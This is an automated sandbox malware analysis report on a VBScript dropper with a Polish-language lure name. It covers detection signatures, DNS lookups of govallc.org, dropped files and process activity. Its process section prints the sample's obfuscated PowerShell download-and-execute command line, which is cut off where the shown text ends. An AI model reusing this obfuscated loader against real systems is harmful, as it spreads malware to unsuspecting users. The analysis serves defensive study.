      Remote System Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
      System Network Configuration Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
      File and Directory Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem12
      System Information Discovery      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1533092 Sample: MPOL_74836582 Zapytanie Pot... Startdate: 14/10/2024 Architecture: WINDOWS Score: 88 22 aszzzw_6777.6777.6777.677e 2->22 24 govallc.org 2->24 26 Yara detected Powershell download and execute 2->26 28 Potential evasive VBS script found (sleep loop) 2->28 30 Sigma detected: WScript or CScript Dropper 2->30 32 AI detected suspicious sample 2->32 8 wscript.exe 1 2->8         started        signatures3 process4 signatures5 34 VBScript performs obfuscated calls to suspicious functions 8->34 36 Suspicious powershell command line found 8->36 38 Wscript starts Powershell (via cmd or directly) 8->38 40 2 other signatures 8->40 11 cmd.exe 1 8->11         started        14 powershell.exe 14 46 8->14         started        process6 signatures7 42 Uses ping.exe to check the status of other devices and networks 11->42 16 conhost.exe 11->16         started        18 PING.EXE 1 11->18         started        20 conhost.exe 14->20         started        process8

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs0%ReversingLabs

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://nuget.org/NuGet.exe0%URL Reputationsafe
      https://aka.ms/pscore680%URL Reputationsafe
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      https://contoso.com/0%URL Reputationsafe
      https://nuget.org/nuget.exe0%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      aszzzw_6777.6777.6777.677e
      		unknown
      		unknowntrue
        		unknown
        govallc.org
        		unknown
        		unknownfalse
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://govallc.orgpowershell.exe, 0000000B.00000002.2571576679.000002A2C6598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5C93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5F40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5B48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C56A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C6514000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C6360000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C66B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C6774000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5A10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5D57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C4FE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C543F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C63FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C65E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C69B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C52F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C6813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2571576679.000002A2C5E3E000.00000004.00000800.00020000.00000000.sdmpfalse
            		unknown
            https://govallc.org/redningsblternes.asiPpowershell.exe, 0000000B.00000002.2571576679.000002A2C4FE7000.00000004.00000800.00020000.00000000.sdmpfalse
              		unknown
              http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.2591792743.000002A2D4F76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2591792743.000002A2D4E34000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://aka.ms/pscore68powershell.exe, 0000000B.00000002.2571576679.000002A2C4DC1000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2571576679.000002A2C4FE7000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000B.00000002.2571576679.000002A2C4DC1000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2571576679.000002A2C4FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                		unknown
                https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2571576679.000002A2C4FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                  		unknown
                  https://contoso.com/powershell.exe, 0000000B.00000002.2591792743.000002A2D4E34000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.2591792743.000002A2D4F76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2591792743.000002A2D4E34000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2591792743.000002A2D4E34000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2591792743.000002A2D4E34000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown

                  World Map of Contacted IPs

                  No contacted IP infos

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1533092
                  Start date and time:2024-10-14 13:09:06 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 4m 32s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:19
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs
                  Detection:MAL
                  Classification:mal88.troj.expl.evad.winVBS@9/3@17/0
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 6
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .vbs

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 7344 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  07:10:06API Interceptor3468614x Sleep call for process: powershell.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASNs

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:modified
                  Size (bytes):11608
                  Entropy (8bit):4.890472898059848
                  Encrypted:false
                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                  MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                  SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                  SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                  SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_23kl5m5z.pxu.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sa2gxs0x.djv.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  Static File Info

                  General

                  File type:ASCII text, with very long lines (1111), with CRLF line terminators
                  Entropy (8bit):5.3737713630267985
                  TrID:
                  • Visual Basic Script (13500/0) 100.00%
                  File name:MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs
                  File size:8'164 bytes
                  MD5:a74cf7fea2f317f537fadc3e2d34dee5
                  SHA1:1df8410433bba83aa58596cd88a9c084a5a8e43a
                  SHA256:c0d20c1324c32ec11ee40a892c6ae0b954f6972e19ce9e976bcf565091f12cdd
                  SHA512:ea1505953b80b96b450bc0cda83a1c3bd3001f057a874bce22646cd7ade2b4ed8fe39cff208255cb84eb60a931a3d73164d7ab05f7fee795bbbae4f5b82caa68
                  SSDEEP:192:8K9O+aSHwmoFMKNdYggfJtvK5I76yDP8Te:LaSHOFHNdYvu586dy
                  TLSH:7AF1185821068D5C7F8A70650D46B9B72DE0C81AA63DC806EC3E2E6920C5C5F9AF8BDC
                  File Content Preview:....Function Galge(Plastvare, pensionren ,Affase162 )......Set Keeper67 = CreateObject("VBScript.RegExp")....Keeper67.Global = True..Keeper67.Pattern = pensionren..Galge = Keeper67.Replace(Plastvare, Affase162)......End Function........wreaker = Afmgtigt.

                  File Icon

                  Icon Hash:68d69b8f86ab9a86

                  Network Behavior

                  Network Port Distribution

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Oct 14, 2024 13:10:03.406757116 CEST5617153192.168.2.71.1.1.1
                  Oct 14, 2024 13:10:03.466197968 CEST53561711.1.1.1192.168.2.7
                  Oct 14, 2024 13:10:07.710704088 CEST5094353192.168.2.71.1.1.1
                  Oct 14, 2024 13:10:07.728014946 CEST53509431.1.1.1192.168.2.7
                  Oct 14, 2024 13:10:16.025010109 CEST6039753192.168.2.71.1.1.1
                  Oct 14, 2024 13:10:16.041254044 CEST53603971.1.1.1192.168.2.7
                  Oct 14, 2024 13:10:24.050164938 CEST5065753192.168.2.71.1.1.1
                  Oct 14, 2024 13:10:24.573916912 CEST53506571.1.1.1192.168.2.7
                  Oct 14, 2024 13:10:29.241475105 CEST6532153192.168.2.71.1.1.1
                  Oct 14, 2024 13:10:29.257173061 CEST53653211.1.1.1192.168.2.7
                  Oct 14, 2024 13:10:37.300509930 CEST6143153192.168.2.71.1.1.1
                  Oct 14, 2024 13:10:37.376025915 CEST53614311.1.1.1192.168.2.7
                  Oct 14, 2024 13:10:45.433752060 CEST5404253192.168.2.71.1.1.1
                  Oct 14, 2024 13:10:45.445193052 CEST53540421.1.1.1192.168.2.7
                  Oct 14, 2024 13:10:53.555665016 CEST5732353192.168.2.71.1.1.1
                  Oct 14, 2024 13:10:53.632126093 CEST53573231.1.1.1192.168.2.7
                  Oct 14, 2024 13:11:01.659446001 CEST5248453192.168.2.71.1.1.1
                  Oct 14, 2024 13:11:01.669642925 CEST53524841.1.1.1192.168.2.7
                  Oct 14, 2024 13:11:09.691106081 CEST6422053192.168.2.71.1.1.1
                  Oct 14, 2024 13:11:09.700177908 CEST53642201.1.1.1192.168.2.7
                  Oct 14, 2024 13:11:17.759777069 CEST5759953192.168.2.71.1.1.1
                  Oct 14, 2024 13:11:17.775520086 CEST53575991.1.1.1192.168.2.7
                  Oct 14, 2024 13:11:25.878482103 CEST5640353192.168.2.71.1.1.1
                  Oct 14, 2024 13:11:25.894794941 CEST53564031.1.1.1192.168.2.7
                  Oct 14, 2024 13:11:33.925391912 CEST5488053192.168.2.71.1.1.1
                  Oct 14, 2024 13:11:33.940335989 CEST53548801.1.1.1192.168.2.7
                  Oct 14, 2024 13:11:41.973211050 CEST5051153192.168.2.71.1.1.1
                  Oct 14, 2024 13:11:41.988887072 CEST53505111.1.1.1192.168.2.7
                  Oct 14, 2024 13:11:50.004601002 CEST6336753192.168.2.71.1.1.1
                  Oct 14, 2024 13:11:50.015758991 CEST53633671.1.1.1192.168.2.7
                  Oct 14, 2024 13:11:58.445367098 CEST5758053192.168.2.71.1.1.1
                  Oct 14, 2024 13:11:58.456237078 CEST53575801.1.1.1192.168.2.7
                  Oct 14, 2024 13:12:06.894614935 CEST6320453192.168.2.71.1.1.1
                  Oct 14, 2024 13:12:06.905020952 CEST53632041.1.1.1192.168.2.7

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Oct 14, 2024 13:10:03.406757116 CEST192.168.2.71.1.1.10x6ffaStandard query (0)aszzzw_6777.6777.6777.677eA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:10:07.710704088 CEST192.168.2.71.1.1.10xb9a2Standard query (0)govallc.orgA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:10:16.025010109 CEST192.168.2.71.1.1.10x9aceStandard query (0)govallc.orgA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:10:24.050164938 CEST192.168.2.71.1.1.10x5fe5Standard query (0)govallc.orgA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:10:29.241475105 CEST192.168.2.71.1.1.10x17afStandard query (0)govallc.orgA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:10:37.300509930 CEST192.168.2.71.1.1.10xa4d8Standard query (0)govallc.orgA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:10:45.433752060 CEST192.168.2.71.1.1.10x8832Standard query (0)govallc.orgA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:10:53.555665016 CEST192.168.2.71.1.1.10xf461Standard query (0)govallc.orgA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:11:01.659446001 CEST192.168.2.71.1.1.10x13d9Standard query (0)govallc.orgA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:11:09.691106081 CEST192.168.2.71.1.1.10x3007Standard query (0)govallc.orgA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:11:17.759777069 CEST192.168.2.71.1.1.10xa0b6Standard query (0)govallc.orgA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:11:25.878482103 CEST192.168.2.71.1.1.10x3f4aStandard query (0)govallc.orgA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:11:33.925391912 CEST192.168.2.71.1.1.10x697dStandard query (0)govallc.orgA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:11:41.973211050 CEST192.168.2.71.1.1.10xb021Standard query (0)govallc.orgA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:11:50.004601002 CEST192.168.2.71.1.1.10x342fStandard query (0)govallc.orgA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:11:58.445367098 CEST192.168.2.71.1.1.10xcb14Standard query (0)govallc.orgA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:12:06.894614935 CEST192.168.2.71.1.1.10xa9dcStandard query (0)govallc.orgA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Oct 14, 2024 13:10:03.466197968 CEST1.1.1.1192.168.2.70x6ffaName error (3)aszzzw_6777.6777.6777.677enonenoneA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:10:07.728014946 CEST1.1.1.1192.168.2.70xb9a2Name error (3)govallc.orgnonenoneA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:10:16.041254044 CEST1.1.1.1192.168.2.70x9aceName error (3)govallc.orgnonenoneA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:10:24.573916912 CEST1.1.1.1192.168.2.70x5fe5Name error (3)govallc.orgnonenoneA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:10:29.257173061 CEST1.1.1.1192.168.2.70x17afName error (3)govallc.orgnonenoneA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:10:37.376025915 CEST1.1.1.1192.168.2.70xa4d8Name error (3)govallc.orgnonenoneA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:10:45.445193052 CEST1.1.1.1192.168.2.70x8832Name error (3)govallc.orgnonenoneA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:10:53.632126093 CEST1.1.1.1192.168.2.70xf461Name error (3)govallc.orgnonenoneA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:11:01.669642925 CEST1.1.1.1192.168.2.70x13d9Name error (3)govallc.orgnonenoneA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:11:09.700177908 CEST1.1.1.1192.168.2.70x3007Name error (3)govallc.orgnonenoneA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:11:17.775520086 CEST1.1.1.1192.168.2.70xa0b6Name error (3)govallc.orgnonenoneA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:11:25.894794941 CEST1.1.1.1192.168.2.70x3f4aName error (3)govallc.orgnonenoneA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:11:33.940335989 CEST1.1.1.1192.168.2.70x697dName error (3)govallc.orgnonenoneA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:11:41.988887072 CEST1.1.1.1192.168.2.70xb021Name error (3)govallc.orgnonenoneA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:11:50.015758991 CEST1.1.1.1192.168.2.70x342fName error (3)govallc.orgnonenoneA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:11:58.456237078 CEST1.1.1.1192.168.2.70xcb14Name error (3)govallc.orgnonenoneA (IP address)IN (0x0001)false
                  Oct 14, 2024 13:12:06.905020952 CEST1.1.1.1192.168.2.70xa9dcName error (3)govallc.orgnonenoneA (IP address)IN (0x0001)false

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:1
                  Start time:07:10:01
                  Start date:14/10/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs"
                  Imagebase:0x7ff77bbc0000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:6
                  Start time:07:10:02
                  Start date:14/10/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:cmd.exe /c ping aszzzw_6777.6777.6777.677e
                  Imagebase:0x7ff734ea0000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:7
                  Start time:07:10:02
                  Start date:14/10/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff75da10000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:8
                  Start time:07:10:02
                  Start date:14/10/2024
                  Path:C:\Windows\System32\PING.EXE
                  Wow64 process (32bit):false
                  Commandline:ping aszzzw_6777.6777.6777.677e
                  Imagebase:0x7ff65b870000
                  File size:22'528 bytes
                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  General

                  Target ID:11
                  Start time:07:10:03
                  Start date:14/10/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus 'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140 (Jus 'Terp$NeksT Gr,eLydssU.ostPotpu OvedStabs supkJuntr SemiGearvMedln icri Skon tupg riss Pasf TilaMisecHemaiStatlpeaciWaistTempeBanktKr.peInexnEvin.U.reHStraeS,orahelmdPluseKanarArvesNyru[Scyl$kallRBetueToi t Ni sTrenpDigirS,igaCr skOl es lluiLinas Mo.esmagnKni.sUnde]Unib= D c$PilaC emaofolluSubvrMuditdisteSk rzRatiaKaninBortrB riylogi ');$Quickwittedness=Jus 'Reto$ VreTJordeNortsUncotUdspulitodFluesRea kJacor B ti MelvDirenInd,iNon,n resgLkkesWin f indamesac Snoitr nlBilliPlebtgenfe PertFasce BranLade.P eaDWal o BhiwVestnPurbl SkioAnsaaTricdPavoFAndriSvinlundeeMil (Ital$kro 